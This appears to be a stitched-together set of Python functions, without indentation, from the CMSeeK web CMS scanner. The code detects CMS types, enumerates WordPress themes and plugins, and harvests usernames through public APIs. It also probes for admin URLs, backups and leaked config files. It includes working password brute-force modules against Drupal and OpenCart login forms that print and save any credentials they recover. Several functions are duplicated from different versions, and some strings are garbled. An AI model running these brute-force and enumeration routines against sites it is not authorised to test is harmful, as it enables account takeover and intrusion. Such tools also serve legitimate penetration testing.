def start(version, ua):
if version == "0":
cmseek.warning(
"Skipping version vulnerability scan as WordPress Version wasn't detected"
)
wpvdbres = '0' # fix for issue #3
result = ""
vfc = ""
else: ## So we have a version let's scan for vulnerabilities
cmseek.info(
"Checking version vulnerabilities [props to wpvulndb for their awesome api ;)]"
)
vfc = version.replace(
'.', ''
) # NOT IMPORTANT: vfc = version for check well we have to kill all the .s in the version for looking it up on wpvulndb.. kinda weird if you ask me
ws = cmseek.getsource("https://wpvulndb.com/api/v2/wordpresses/" + vfc,
ua)
print(ws[0])
if ws[0] == "1":
# wjson = json.loads(ws[1]) + vfd + "['release_date']"
wpvdbres = '1' ## We have the wpvulndb results
result = json.loads(ws[1])[version]
else:
wpvdbres = '0'
result = ""
cmseek.error('Error Retriving data from wpvulndb')
return [wpvdbres, result, vfc]
def start(source):
cmseek.info('Starting passive theme enumeration')
## plug_file = open('database/themes.json', 'r')
## plug_data = plug_file.read()
## plug_json = json.loads(plug_data)
plug_regex = re.compile(
'wp-content/themes/(.*?)/.*?[css|js].*?ver=([0-9\.]*)')
results = plug_regex.findall(source)
themes = []
found = 0
for result in results:
# found += 1
name = result[0].replace('-master', '').replace('.min', '')
nc = name + ":"
if nc not in str(themes):
version = result[1]
each_theme = name + ":" + version
themes.append(each_theme)
themes = set(themes)
found = len(themes)
if found > 0:
if found == 1:
cmseek.success(cmseek.bold + cmseek.fgreen + str(found) +
" theme detected!")
else:
cmseek.success(cmseek.bold + cmseek.fgreen + str(found) +
" themes detected!")
else:
cmseek.error('Could not detect theme!')
return [found, themes]
def start(source,url,ua):
cmseek.info('Starting passive theme enumeration')
## plug_file = open('database/themes.json', 'r')
## plug_data = plug_file.read()
## plug_json = json.loads(plug_data)
plug_regex = re.compile('wp-content/themes/(.*?)/.*?[css|js].*?ver=([0-9\.]*)')
results = plug_regex.findall(source)
themes = []
found = 0
for result in results:
# found += 1
name = result[0].replace('-master','').replace('.min','')
nc = name + ":"
if nc not in str(themes):
version = result[1]
each_theme = name + ":" + version + "|"
# look if theme zip available
cmseek.statement('Looking for theme zip file!')
theme_zip = url + '/wp-content/themes/' + name + '.zip'
zip_status = cmseek.check_url(theme_zip, ua)
if zip_status == '1':
cmseek.success('Current theme can be downloaded, URL: ' + cmseek.bold + theme_zip + cmseek.cln)
each_theme += '/wp-content/themes/' + name + '.zip'
themes.append(each_theme)
themes = set(themes)
found = len(themes)
if found > 0:
if found == 1:
cmseek.success(cmseek.bold + cmseek.fgreen + str(found) + " theme detected!")
else:
cmseek.success(cmseek.bold + cmseek.fgreen + str(found) + " themes detected!")
else:
cmseek.error('Could not detect theme!')
return [found, themes]
def start(source):
cmseek.info('Starting passive plugin enumeration')
plug_regex = re.compile(
'wp-content/plugins/(.*?)/.*?[css|js].*?ver=([0-9\.]*)')
results = plug_regex.findall(source)
plugins = []
found = 0
for result in results:
# found += 1
name = result[0].replace('-master', '').replace('.min', '')
nc = name + ":"
if nc not in str(plugins):
version = result[1]
each_plugin = name + ":" + version
plugins.append(each_plugin)
plugins = set(plugins)
found = len(plugins)
if found > 0:
if found == 1:
cmseek.success(cmseek.bold + cmseek.fgreen + str(found) +
" Plugin enumerated!")
else:
cmseek.success(cmseek.bold + cmseek.fgreen + str(found) +
" Plugins enumerated!")
else:
cmseek.error('No plugins enumerated!')
return [found, plugins]
def start(url, ua):
reg_url = url + '/wp-login.php?action=register'
cmseek.info('Checking user registration status')
reg_source = cmseek.getsource(reg_url, ua)
reg_status = '0'
if reg_source[0] == '1' and '<form' in reg_source[1]:
if 'Registration confirmation will be emailed to you' in reg_source[
1] or 'value="Register"' in reg_source[
1] or 'id="user_email"' in reg_source[1]:
cmseek.success('User registration open: ' + cmseek.bold +
cmseek.fgreen + reg_url + cmseek.cln)
reg_status = '1'
return [reg_status, reg_url]
def init(cmseek_dir, report_dir=""):
'''
Creates/Updates result index
Needed Parameters:
cmseek_dir = CMSeeK directory / access_directory
report_dir = path to report directory leave empty if default
'''
# Create a json list of all the sites scanned and save it to <cmseek_dir>/reports.json
cmseek.info('Updating CMSeeK result index...')
if os.path.isdir(cmseek_dir):
index_file = os.path.join(cmseek_dir, 'reports.json')
if report_dir == "":
report_dir = os.path.join(cmseek_dir, 'Result')
if os.path.isdir(report_dir):
result_index = {}
result_dirs = os.listdir(report_dir)
for result_dir in result_dirs:
scan_file = os.path.join(report_dir, result_dir, 'cms.json')
if os.path.isfile(scan_file):
try:
with open(scan_file, 'r', encoding='utf8') as sf:
scan_content = json.loads(sf.read())
scan_url = scan_content['url']
result_index[scan_url] = {
"cms_id": scan_content['cms_id'],
"date": scan_content['last_scanned'],
"report": scan_file
}
except Exception as e:
logging.error(traceback.format_exc())
cmseek.statement('Skipping invalid CMSeeK result: ' +
scan_file)
# Write index
result_index = {
"last_updated": str(datetime.datetime.now()),
"results": [result_index]
}
inf = open(index_file, 'w+')
inf.write(json.dumps(result_index, sort_keys=False, indent=4))
inf.close()
cmseek.success('Report index updated successfully!')
cmseek.report_index = result_index
return ['1', 'Report index updated successfully!']
else:
cmseek.error('Result directory does not exist!')
return [0, 'Result directory does not exist']
else:
cmseek.error('Invalid CMSeeK directory passed!')
return [0, 'CMSeeK directory does not exist']
def start(id, url, ua, ga, source):
cmseek.info("Starting Username Harvest")
# User enumertion via site's json api
cmseek.info('Harvesting usernames from wp-json api')
wpjsonuser = []
wpjsonsrc = cmseek.getsource(url + '/wp-json/wp/v2/users', ua)
if wpjsonsrc[0] != "1" or 'slug' not in wpjsonsrc[1]:
cmseek.warning("Json api method failed trying with next")
else:
try:
for user in json.loads(wpjsonsrc[1]):
wpjsonuser.append(user['slug'])
cmseek.success("Found user from wp-json : " + cmseek.fgreen + cmseek.bold + user['slug'] + cmseek.cln)
except:
cmseek.warning("Failed to parse json")
# user enumertion vua jetpack api
cmseek.info('Harvesting usernames from jetpack public api')
jpapiuser = []
strippedurl = url.replace('http://','')
strippedurl = strippedurl.replace('https://', '') # Pretty sure it is an ugly solution but oh well
jpapisrc = cmseek.getsource('https://public-api.wordpress.com/rest/v1.1/sites/' + strippedurl + '/posts?number=100&pretty=true&fields=author', ua)
if jpapisrc[0] != '1' or 'login' not in jpapisrc[1]:
cmseek.warning('No results from jetpack api... maybe the site doesn\'t use jetpack')
else:
for user in json.loads(jpapisrc[1])['posts']:
if user['author']['login'] not in str(jpapiuser):
jpapiuser.append(user['author']['login'])
cmseek.success("Found user from Jetpack api : " + cmseek.fgreen + cmseek.bold + user['author']['login'] + cmseek.cln)
jpapiuser = list(set(usr.strip() for usr in jpapiuser)) # Removing duplicate usernames
# the regular way of checking vua user Parameter -- For now just check upto 20 ids
cmseek.info('Harvesting usernames from wordpress author Parameter')
global wpparamuser
wpparamuser = []
usrrange = range(31) # ain't it Obvious
threads = [threading.Thread(target=wpauthorenum, args=(ua,url,r)) for r in usrrange]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# Combine all the usernames that we collected
usernames = set(wpjsonuser+jpapiuser+wpparamuser)
if len(usernames) > 0:
usernamesgen = '1' # Some usernames were harvested
if len(usernames) == 1:
cmseek.success(cmseek.bold + cmseek.fgreen + str(len(usernames)) + " Usernames" + " was enumerated" + cmseek.cln)
else:
cmseek.success(cmseek.bold + cmseek.fgreen + str(len(usernames)) + " Usernames" + " were enumerated" + cmseek.cln)
else:
usernamesgen = '0' # Failure
cmseek.warning("Couldn't enumerate usernames :( ")
return [usernamesgen, usernames]
def main_proc(site, cua):
cmseek.clearscreen()
cmseek.banner("CMS Detection And Deep Scan")
cmseek.info("Scanning Site: " + site)
cmseek.statement("User Agent: " + cua)
cmseek.statement("Collecting Headers and Page Source for Analysis")
init_source = cmseek.getsource(site, cua)
if init_source[0] != '1':
cmseek.error(
"Aborting CMSeek! Couldn't connect to site \n Error: %s" %
init_source[1])
return
else:
scode = init_source[1]
headers = init_source[2]
if site != init_source[3] and site + '/' != init_source[3]:
cmseek.info('Target redirected to: ' + cmseek.bold +
cmseek.fgreen + init_source[3] + cmseek.cln)
follow_redir = input('[#] Set ' + cmseek.bold + cmseek.fgreen +
init_source[3] + cmseek.cln +
' as target? (y/n): ')
if follow_redir.lower() == 'y':
site = init_source[3]
if scode == '':
# silly little check thought it'd come handy
cmseek.error('Aborting detection, source code empty')
return
cmseek.statement("Detection Started")
## init variables
cms = '' # the cms id if detected
cms_detected = '0' # self explanotory
detection_method = '' # ^
ga = '0' # is generator available
if 'generator' in scode or 'Generator' in scode:
ga = '1'
cmseek.statement("Using headers to detect CMS (Stage 1 of 3)")
header_detection = header.check(headers)
if header_detection[0] == '1':
detection_method = 'header'
cms = header_detection[1]
cms_detected = '1'
if cms_detected == '0' and ga == '1':
# cms detection via generator
cmseek.statement(
"Using Generator meta tag to detect CMS (Stage 2 of 3)")
gen_detection = source.generator(scode)
if gen_detection[0] == '1':
detection_method = 'generator'
cms = gen_detection[1]
cms_detected = '1'
else:
# Check cms using source code
cmseek.statement("Using source code to detect CMS (Stage 3 of 3)")
source_check = source.check(scode, site)
if source_check[0] == '1':
detection_method = 'source'
cms = source_check[1]
cms_detected = '1'
if cms_detected == '1':
cmseek.success('CMS Detected, CMS ID: ' + cmseek.bold + cms +
cmseek.cln + ', Detection method: ' + cmseek.bold +
detection_method + cmseek.cln)
cmseek.update_log('detection_param', detection_method)
cmseek.update_log('cms_id', cms) # update log
cmseek.statement('Getting CMS info from databse')
cms_info = getattr(cmsdb, cms)
if cms_info['deeps'] == '1':
# cmseek.success('Starting ' + cmseek.bold + cms_info['name'] + ' deep scan' + cmseek.cln)
advanced.start(cms, site, cua, ga, scode)
return
elif cms_info['vd'] == '1':
cmseek.success('Version detection available')
cms_version = version_detect.start(cms, site, cua, ga, scode)
cmseek.clearscreen()
cmseek.banner("CMS Scan Results")
cmseek.result('Target: ', site)
cmseek.result("Detected CMS: ", cms_info['name'])
cmseek.update_log('cms_name', cms_info['name']) # update log
if cms_version != '0':
cmseek.result("CMS Version: ", cms_version)
cmseek.update_log('cms_version', cms_version) # update log
cmseek.result("CMS URL: ", cms_info['url'])
cmseek.update_log('cms_url', cms_info['url']) # update log
return
else:
# nor version detect neither DeepScan available
cmseek.clearscreen()
cmseek.banner("CMS Scan Results")
cmseek.result('Target: ', site)
cmseek.result("Detected CMS: ", cms_info['name'])
cmseek.update_log('cms_name', cms_info['name']) # update log
cmseek.result("CMS URL: ", cms_info['url'])
cmseek.update_log('cms_url', cms_info['url']) # update log
return
else:
print('\n')
cmseek.error(
'CMS Detection failed, if you know the cms please help me improve CMSeeK by reporting the cms along with the target by creating an issue'
)
print('''
{2}Create issue:{3} https://github.com/Tuhinshubhra/CMSeeK/issues/new
{4}Title:{5} [SUGGESTION] CMS detction failed!
{6}Content:{7}
- CMSeeK Version: {0}
- Target: {1}
- Probable CMS: <name and/or cms url>
N.B: Create issue only if you are sure, please avoid spamming!
'''.format(cmseek.cmseek_version, site, cmseek.bold, cmseek.cln,
cmseek.bold, cmseek.cln, cmseek.bold, cmseek.cln))
return
return
def start():
cmseek.clearscreen()
cmseek.banner("Drupal Bruteforce Module")
url = cmseek.targetinp("") # input('Enter Url: ')
cmseek.info("Checking for Drupal")
bsrc = cmseek.getsource(url, cmseek.randomua('onceuponatime'))
if bsrc[0] != '1':
cmseek.error("Could not get target source, CMSeek is quitting")
cmseek.handle_quit()
else:
## Parse generator meta tag
parse_generator = generator.parse(bsrc[1])
ga = parse_generator[0]
ga_content = parse_generator[1]
try1 = generator.scan(ga_content)
if try1[0] == '1' and try1[1] == 'dru':
drucnf = '1'
else:
try2 = source.check(
bsrc[1],
url) # Confirming Drupal using other source code checks
if try2[0] == '1' and try2[1] == 'dru':
drucnf = '1'
else:
try3 = header.check(bsrc[2]) # Headers Check!
if try3[0] == '1' and try3[1] == 'dru':
drucnf = '1'
else:
drucnf = '0'
if drucnf != '1':
cmseek.error('Could not confirm Drupal... CMSeek is quitting')
cmseek.handle_quit()
else:
cmseek.success("Drupal Confirmed... Checking for Drupal login form")
druloginsrc = cmseek.getsource(
url + '/user/login/',
cmseek.randomua('therelivedaguynamedkakashi'))
if druloginsrc[0] == '1' and '<form' in druloginsrc[
1] and 'name="form_id" value="' in druloginsrc[1]:
cmseek.success("Login form found! Retriving form id value")
fid = re.findall(r'name="form_id" value="(.*?)"', druloginsrc[1])
if fid == []:
cmseek.error("Could not find form_id, CMSeeK is quitting!")
cmseek.handle_quit()
else:
cmseek.success('form_id found: ' + cmseek.bold + fid[0] +
cmseek.cln)
form_id = fid[0]
druparamuser = ['']
rawuser = input(
"[~] Enter Usernames with coma as separation without any space (example: cris,harry): "
).split(',')
for rusr in rawuser:
druparamuser.append(rusr)
drubruteusers = set(druparamuser) ## Strip duplicate usernames
for user in drubruteusers:
if user != '':
print('\n')
cmseek.info("Bruteforcing User: "******"wordlist/passwords.txt", "r")
passwords = pwd_file.read().split('\n')
passwords.insert(0, user)
passfound = '0'
for password in passwords:
if password != '' and password != '\n':
sys.stdout.write('[*] Testing Password: '******'%s\r\r' % password)
sys.stdout.flush()
cursrc = testlogin(url, user, password, form_id)
# print(cursrc)
if '/user/login/' in str(cursrc):
continue
else:
cmseek.success('Password found! \n\n\n')
# print (cursrc)
cmseek.success('Password found!')
print(" |\n |--[username]--> " + cmseek.bold +
user + cmseek.cln +
"\n |\n |--[password]--> " +
cmseek.bold + password + cmseek.cln +
"\n |")
cmseek.success('Enjoy The Hunt!')
cmseek.savebrute(url, url + '/user/login',
user, password)
passfound = '1'
break
break
if passfound == '0':
cmseek.error('\n\nCould Not find Password!')
print('\n\n')
else:
cmseek.error("Couldn't find login form... CMSeeK is quitting")
cmseek.handle_quit()
cmseek.clearscreen()
cmseek.banner("CMS Detection And Deep Scan")
site = cmseek.targetinp("") # Get The User input
cua = cmseek.randomua()
core.main_proc(site, cua)
cmseek.handle_quit()
elif selone == '2':
cmseek.clearscreen()
cmseek.banner("CMS Detection And Deep Scan")
sites_list = []
sites = input(
'Enter comma separated urls(http://1.com,https://2.org) or enter path of file containing URLs (comma separated): '
)
if 'http' not in sites or '://' not in sites:
cmseek.info('Treating input as path')
try:
ot = open(sites, 'r')
file_contents = ot.read().replace('\n', '')
sites_list = file_contents.split(',')
except FileNotFoundError:
cmseek.error('Invalid path! CMSeeK is quitting')
cmseek.bye()
else:
cmseek.info('Treating input as URL list')
sites_list = sites.split(',')
if sites_list != []:
cua = cmseek.randomua()
for s in sites_list:
target = cmseek.process_url(s)
if target != '0':
if args.verbose:
cmseek.verbose = True
if args.follow_redirect:
cmseek.redirect_conf = '1'
if args.no_redirect:
cmseek.redirect_conf = '2'
if args.update:
cmseek.update()
if args.version:
print('\n\n')
cmseek.info("CMSeeK Version: " + cmseek.cmseek_version)
cmseek.bye()
if args.user_agent is not None:
cua = args.user_agent
elif args.random_agent is not None:
cua = cmseek.randomua('random')
else:
cua = None
if args.googlebot:
cua = 'Googlebot/2.1 (+http://www.google.com/bot.html)'
if args.url is not None:
s = args.url
target = cmseek.process_url(s)
if target != '0':
def start(id, url, ua, ga, source):
# init variables
vuln_detection = '0'
vuln_count = 0
joom_vulns = []
# Version Detection
version = version_detect.start(id, url, ua, ga, source)
# Detecting joomla core vulnerabilities
jcv = core_vuln.start(version)
vuln_detection = jcv[0]
vuln_count = jcv[1]
joom_vulns = jcv[2]
# README.txt
readmesrc = cmseek.getsource(url + '/README.txt', ua)
if readmesrc[
0] != '1': ## something went wrong while getting the source codes
cmseek.statement(
"Couldn't get readme file's source code most likely it's not present"
)
readmefile = '0'
elif 'This is a Joomla!' in readmesrc[1]:
cmseek.info('README.txt file found')
readmefile = '1' # Readme file present
else:
readmefile = '2' # Readme file found but most likely it's not of joomla
# Debug Mode
cmseek.info('Checking debug mode status')
debug_mode = check_debug.start(source)
# Check user registration status
cmseek.statement('Checking if user registration is enabled')
registration = user_registration.start(url, ua)
# Find admin url
cmseek.info('Locating admin url')
admin = admin_finder.start(url, ua)
# Backups check
cmseek.info('Checking for common Backups')
backups = backup_finder.start(url, ua)
# Check Potential configuration file leak
cmseek.info('Looking for potential config leak')
configs = config_check.start(url, ua)
# Checking for directory listing
cmseek.statement('Checking for directory listing')
directories = dir_list.start(url, ua)
### THE RESULTS START FROM HERE
cmseek.clearscreen()
cmseek.banner("Deep Scan Results")
cmseek.result('Target: ', url)
cmseek.result("Detected CMS: ", 'Joomla')
cmseek.update_log('cms_name', 'joomla') # update log
cmseek.result("CMS URL: ", "https://joomla.org")
cmseek.update_log('cms_url', "https://joomla.org") # update log
if version != '0':
cmseek.result("Joomla Version: ", version)
cmseek.update_log('joomla_version', version)
if registration[0] == '1':
cmseek.result('User registration enabled: ', registration[1])
cmseek.update_log('user_registration_url', registration[1])
if debug_mode == '1':
cmseek.result('Debug mode enabled', '')
cmseek.update_log('joomla_debug_mode', 'enabled')
else:
cmseek.update_log('joomla_debug_mode', 'disabled')
if readmefile == '1':
cmseek.result('Readme file: ', url + '/README.txt')
cmseek.update_log('joomla_readme_file', url + '/README.txt')
if admin[0] > 0:
cmseek.result('Admin URL: ', url + admin[1][0])
admin_log = ''
for adm in admin[1]:
admin_log += url + '/' + adm + ','
# print(cmseek.bold + cmseek.fgreen + " [B] " + cmseek.cln + url + '/' + adm)
cmseek.update_log('joomla_backup_files', admin_log)
print('\n')
if directories[0] > 0:
cmseek.result('Open directories: ', str(directories[0]))
cmseek.success('Open directory url: ')
dirs = ''
for dir in directories[1]:
dirs += url + '/' + dir + ','
print(cmseek.bold + cmseek.fgreen + " [>] " + cmseek.cln + url +
dir)
cmseek.update_log('directory_listing', dirs)
print('\n')
if backups[0] > 0:
cmseek.result('Found potential backup file: ', str(backups[0]))
cmseek.success('Backup URLs: ')
bkup_log = ''
for backup in backups[1]:
bkup_log += url + '/' + backup + ','
print(cmseek.bold + cmseek.fgreen + " [B] " + cmseek.cln + url +
'/' + backup)
cmseek.update_log('joomla_backup_files', bkup_log)
print('\n')
if configs[0] > 0:
cmseek.result('Found potential Config file: ', str(configs[0]))
cmseek.success('Config URLs: ')
conf_log = ''
for config in configs[1]:
conf_log += url + '/' + config + ','
print(cmseek.bold + cmseek.fgreen + " [c] " + cmseek.cln + url +
'/' + config)
cmseek.update_log('joomla_config_files', conf_log)
print('\n')
if vuln_detection == '1' and vuln_count > 0:
cmseek.result('Total joomla core vulnerabilities: ', str(vuln_count))
cmseek.info('Vulnerabilities found: \n')
for vuln in joom_vulns:
vuln = vuln.replace('\\n', cmseek.cln + '\n ')
print(cmseek.bold + cmseek.red + '[v] ' + vuln)
print('\n')
elif vuln_detection == '2':
cmseek.warning(
'Couldn\'t find core vulnerabilities, No VERSION detected')
elif vuln_detection == '3':
cmseek.error('Core vulnerability database not found!')
else:
cmseek.warning('No core vulnerabilities detected!')
def main_proc(site, cua):
cmseek.clearscreen()
cmseek.banner("CMS Detection And Deep Scan")
cmseek.info("Scanning Site: " + site)
cmseek.statement("User Agent: " + cua)
cmseek.statement("Collecting Headers and Page Source for Analysis")
init_source = cmseek.getsource(site, cua)
if init_source[0] != '1':
cmseek.error(
"Aborting CMSeek! Couldn't connect to site \n Error: %s" %
init_source[1])
return
else:
scode = init_source[1]
headers = init_source[2]
if site != init_source[3] and site + '/' != init_source[3]:
cmseek.info('Target redirected to: ' + cmseek.bold +
cmseek.fgreen + init_source[3] + cmseek.cln)
follow_redir = input('[#] Set ' + cmseek.bold + cmseek.fgreen +
init_source[3] + cmseek.cln +
' as target? (y/n): ')
if follow_redir.lower() == 'y':
site = init_source[3]
cmseek.statement(
"Reinitiating Headers and Page Source for Analysis")
tmp_req = cmseek.getsource(site, cua)
scode = tmp_req[1]
headers = tmp_req[2]
if scode == '':
# silly little check thought it'd come handy
cmseek.error('Aborting detection, source code empty')
return
cmseek.statement("Detection Started")
## init variables
cms = '' # the cms id if detected
cms_detected = '0' # self explanotory
detection_method = '' # ^
ga = '0' # is generator available
ga_content = '' # Generator content
## Parse generator meta tag
parse_generator = generator.parse(scode)
ga = parse_generator[0]
ga_content = parse_generator[1]
cmseek.statement("Using headers to detect CMS (Stage 1 of 4)")
header_detection = header.check(headers)
if header_detection[0] == '1':
detection_method = 'header'
cms = header_detection[1]
cms_detected = '1'
if cms_detected == '0' and ga == '1':
# cms detection via generator
cmseek.statement(
"Using Generator meta tag to detect CMS (Stage 2 of 4)")
gen_detection = generator.scan(ga_content)
if gen_detection[0] == '1':
detection_method = 'generator'
cms = gen_detection[1]
cms_detected = '1'
else:
cmseek.statement('Skipping stage 2 of 4: No Generator meta tag found')
if cms_detected == '0':
# Check cms using source code
cmseek.statement("Using source code to detect CMS (Stage 3 of 4)")
source_check = source.check(scode, site)
if source_check[0] == '1':
detection_method = 'source'
cms = source_check[1]
cms_detected = '1'
if cms_detected == '0':
# Check cms using robots.txt
cmseek.statement("Using robots.txt to detect CMS (Stage 4 of 4)")
robots_check = robots.check(site, cua)
if robots_check[0] == '1':
detection_method = 'robots'
cms = robots_check[1]
cms_detected = '1'
if cms_detected == '1':
cmseek.success('CMS Detected, CMS ID: ' + cmseek.bold + cmseek.fgreen +
cms + cmseek.cln + ', Detection method: ' +
cmseek.bold + cmseek.lblue + detection_method +
cmseek.cln)
cmseek.update_log('detection_param', detection_method)
cmseek.update_log('cms_id', cms) # update log
cmseek.statement('Getting CMS info from database') # freaking typo
cms_info = getattr(cmsdb, cms)
if cms_info['deeps'] == '1':
# cmseek.success('Starting ' + cmseek.bold + cms_info['name'] + ' deep scan' + cmseek.cln)
advanced.start(cms, site, cua, ga, scode, ga_content)
return
elif cms_info['vd'] == '1':
cmseek.success('Starting version detection')
cms_version = '0' # Failsafe measure
cms_version = version_detect.start(cms, site, cua, ga, scode,
ga_content)
cmseek.clearscreen()
cmseek.banner("CMS Scan Results")
result.target(site)
result.cms(cms_info['name'], cms_version, cms_info['url'])
cmseek.update_log('cms_name', cms_info['name']) # update log
if cms_version != '0' and cms_version != None:
cmseek.update_log('cms_version', cms_version) # update log
cmseek.update_log('cms_url', cms_info['url']) # update log
comptime = round(time.time() - cmseek.cstart, 2)
log_dir = cmseek.log_dir
if log_dir is not "":
log_file = log_dir + "/cms.json"
result.end(str(cmseek.total_requests), str(comptime), log_file)
'''
cmseek.result('Target: ', site)
cmseek.result("Detected CMS: ", cms_info['name'])
cmseek.update_log('cms_name', cms_info['name']) # update log
if cms_version != '0' and cms_version != None:
cmseek.result("CMS Version: ", cms_version)
cmseek.update_log('cms_version', cms_version) # update log
cmseek.result("CMS URL: ", cms_info['url'])
cmseek.update_log('cms_url', cms_info['url']) # update log
'''
return
else:
# nor version detect neither DeepScan available
cmseek.clearscreen()
cmseek.banner("CMS Scan Results")
result.target(site)
result.cms(cms_info['name'], '0', cms_info['url'])
comptime = round(time.time() - cmseek.cstart, 2)
log_dir = cmseek.log_dir
if log_dir is not "":
log_file = log_dir + "/cms.json"
result.end(str(cmseek.total_requests), str(comptime), log_file)
'''
cmseek.result('Target: ', site)
cmseek.result("Detected CMS: ", cms_info['name'])
cmseek.update_log('cms_name', cms_info['name']) # update log
cmseek.result("CMS URL: ", cms_info['url'])
cmseek.update_log('cms_url', cms_info['url']) # update log
'''
return
else:
print('\n')
cmseek.error(
'CMS Detection failed, if you know the cms please help me improve CMSeeK by reporting the cms along with the target by creating an issue'
)
print('''
{2}Create issue:{3} https://github.com/Tuhinshubhra/CMSeeK/issues/new
{4}Title:{5} [SUGGESTION] CMS detction failed!
{6}Content:{7}
- CMSeeK Version: {0}
- Target: {1}
- Probable CMS: <name and/or cms url>
N.B: Create issue only if you are sure, please avoid spamming!
'''.format(cmseek.cmseek_version, site, cmseek.bold, cmseek.cln,
cmseek.bold, cmseek.cln, cmseek.bold, cmseek.cln))
return
return
def start():
cmseek.clearscreen()
cmseek.banner("OpenCart Bruteforce Module")
url = cmseek.targetinp("") # input('Enter Url: ')
cmseek.info("Checking for OpenCart")
bsrc = cmseek.getsource(url, cmseek.randomua('foodislove'))
if bsrc[0] != '1':
cmseek.error("Could not get target source, CMSeek is quitting")
cmseek.handle_quit()
else:
try1 = source.generator(bsrc[1])
if try1[0] == '1' and try1[1] == 'oc':
occnf = '1'
else:
try2 = source.check(bsrc[1], url)
if try2[0] == '1' and try2[1] == 'oc':
occnf = '1'
else:
occnf = '0'
if occnf != '1':
cmseek.error('Could not confirm OpenCart... CMSeek is quitting')
cmseek.handle_quit()
else:
cmseek.success(
"OpenCart Confirmed... Checking for OpenCart login form")
ocloginsrc = cmseek.getsource(url + '/admin/index.php',
cmseek.randomua('thatsprettygay'))
if ocloginsrc[0] == '1' and '<form' in ocloginsrc[
1] and 'route=common/login' in ocloginsrc[1]:
cmseek.success("Login form found!")
ocparamuser = ['']
rawuser = input(
"[~] Enter Usernames with coma as separation without any space (example: cris,harry): "
).split(',')
for rusr in rawuser:
ocparamuser.append(rusr)
ocbruteusers = set(ocparamuser) ## Strip duplicate usernames
for user in ocbruteusers:
if user != '':
passfound = '0'
print('\n')
cmseek.info("Bruteforcing User: "******"wordlist/passwords.txt", "r")
passwords = pwd_file.read().split('\n')
for password in passwords:
if password != '' and password != '\n':
sys.stdout.write('[*] Testing Password: '******'%s\r\r' % password)
sys.stdout.flush()
cursrc = testlogin(url, user, password)
if 'route=common/dashboard&user_token=' in str(
cursrc[3]):
cmseek.success('Password found!')
print(" |\n |--[username]--> " + cmseek.bold +
user + cmseek.cln +
"\n |\n |--[password]--> " +
cmseek.bold + password + cmseek.cln +
"\n |")
cmseek.success('Enjoy The Hunt!')
cmseek.savebrute(url, url + '/admin/index.php',
user, password)
passfound = '1'
break
else:
continue
break
if passfound == '0':
cmseek.error('\n\nCould Not find Password!')
print('\n\n')
else:
cmseek.error("Couldn't find login form... CMSeeK is quitting")
cmseek.handle_quit()
def main_proc(site, cua):
cmseek.clearscreen()
cmseek.banner("CMS Detection And Deep Scan")
cmseek.info("Scanning Site: " + site)
cmseek.statement("User Agent: " + cua)
cmseek.statement("Collecting Headers and Page Source for Analysis")
try:
ckreq = urllib.request.Request(site,
data=None,
headers={'User-Agent': cua})
with urllib.request.urlopen(ckreq) as response:
scode = response.read().decode()
headers = str(response.info())
except Exception as e:
e = str(e)
cmseek.error(
"Aborting CMSeek! Couldn't connect to site \n Error: %s" %
e) #TODO: remove the error msg later if possible
return
# TODO: The source code enumartion > save to site directory > print done
cmseek.statement("Detection Started")
cmseek.statement("Using headers to detect CMS (Stage 1 of 2)")
c1 = header.check(headers)
if c1[0] == "1":
# Do this shit later
cmseek.success(
"CMS Detected, CMS ID: \"%s\" - looking up database for CMS information"
% c1[1])
cmseek.update_log('detection_param', 'header') # update log
cmseek.update_log('cms_id', c1[1]) # update log
cka = getattr(cmsdb, c1[1])
if cka['deeps'] != '1': # Deep Scan
if cka['vd'] != '1': # Version Detection not available for the cms show basic stuff
print('\n')
cmseek.result(
'', "CMS Name: " + cmseek.bold + cmseek.fgreen +
cka['name'] + cmseek.cln)
cmseek.update_log('cms_name', cka['name']) # update log
cmseek.result(
'', "CMS Link: " + cmseek.bold + cmseek.fgreen +
cka['url'] + cmseek.cln)
cmseek.update_log('cms_url', cka['url']) # update log
else:
cmseek.statement(
"CMS Version is detectable, detecting CMS Version")
### Detect version
print('\n')
cmseek.result(
'', "CMS Name: " + cmseek.bold + cmseek.fgreen +
cka['name'] + cmseek.cln)
cmseek.update_log('cms_name', cka['name']) # update log
cmseek.result(
'', "CMS Link: " + cmseek.bold + cmseek.fgreen +
cka['url'] + cmseek.cln)
cmseek.update_log('cms_url', cka['url']) # update log
# return
else:
advanced.deep(
c1[1], site, cua, '2', scode
) ## The 2 suggests that generator check has not been performed
else:
cmseek.warning('No luck with headers... Continuing with source code')
cmseek.statement("Checking for generator meta tag in source code")
if 'Generator' in scode or 'generator' in scode:
cmseek.success(
"Generator meta tag found.. Continuing with detection (2.1 of 2.2)"
)
ga = "1" ## Generator tag found .. this will come in handy later to save us some milliseconds ;)
c21 = source.generator(scode)
if c21[0] == '1':
cmseek.success(
"CMS Detected, CMS ID: \"%s\" - looking up database for CMS information"
% c21[1])
cmseek.update_log('detection_param', 'generator') # update log
cmseek.update_log('cms_id', c21[1]) # update log
cka = getattr(cmsdb, c21[1])
if cka['deeps'] != '1': # Deep Scan not available
if cka['vd'] != '1': # Version Detection not available for the cms show basic stuff
print('\n')
cmseek.result(
'', "CMS Name: " + cmseek.bold + cmseek.fgreen +
cka['name'] + cmseek.cln)
cmseek.update_log('cms_name',
cka['name']) # update log
cmseek.result(
'', "CMS Link: " + cmseek.bold + cmseek.fgreen +
cka['url'] + cmseek.cln)
cmseek.update_log('cms_url', cka['url']) # update log
else:
cmseek.statement(
"CMS Version is detectable, detecting CMS Version")
### Detect version
print('\n')
cmseek.result(
'', "CMS Name: " + cmseek.bold + cmseek.fgreen +
cka['name'] + cmseek.cln)
cmseek.update_log('cms_name',
cka['name']) # update log
cmseek.result(
'', "CMS Link: " + cmseek.bold + cmseek.fgreen +
cka['url'] + cmseek.cln)
cmseek.update_log('cms_url', cka['url']) # update log
# return
else:
advanced.deep(c21[1], site, cua, '1', scode)
elif c21[0] == '2': # Empty Source code
cmseek.error("Source code was empty... exiting CMSeek")
# return
else: ## CMS Detection unsuccessful via generator meta tag
cmseek.warning(
'Could not detect CMS from the generator meta tag, (Procceeding with scan 2.2 of 2.2)'
)
c22 = source.check(scode, site)
if c22[0] == '1':
cmseek.success(
"CMS Detected, CMS ID: \"%s\" - looking up database for CMS information"
% c22[1])
cmseek.update_log('detection_param',
'source') # update log
cmseek.update_log('cms_id', c22[1]) # update log
cka = getattr(cmsdb, c22[1])
if cka['deeps'] != '1': # Deep Scan not available
if cka['vd'] != '1': # Version Detection not available for the cms show basic stuff
print('\n')
cmseek.result(
'', "CMS Name: " + cmseek.bold +
